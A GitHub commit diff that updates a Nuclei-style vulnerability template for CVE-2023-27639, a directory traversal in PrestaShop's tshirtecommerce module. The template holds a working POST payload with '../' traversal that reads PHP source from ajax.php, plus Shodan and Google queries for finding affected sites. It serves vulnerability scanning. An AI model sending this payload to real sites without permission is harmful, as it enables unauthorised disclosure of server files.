updated req,matcher & metadata

patch-1
Ritik Chaddha 2024-01-20 02:35:28 +05:30 committed by GitHub
parent e7ed4d1cb0
commit 71f681c9a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 14 deletions

View File

@ -1,32 +1,43 @@
id: CVE-2023-27639
info:
name: PrestaShop tshirtecommerce Directory Traversal
name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO
severity: high
description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cve-id: CVE-2023-27639
metadata:
max-request: 1
product: tshirtecommerce
verified: true
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,lfi
product: tshirtecommerce
google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
http:
- method: POST
path:
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
headers:
- raw:
- |
POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
matchers-condition: and
matchers:
- type: word
words:
- "SqlFormatter Examples"
- type: word
words:
- "?php"
- "SqlFormatter"
- "<?php"
condition: and
- type: status
status:
- 200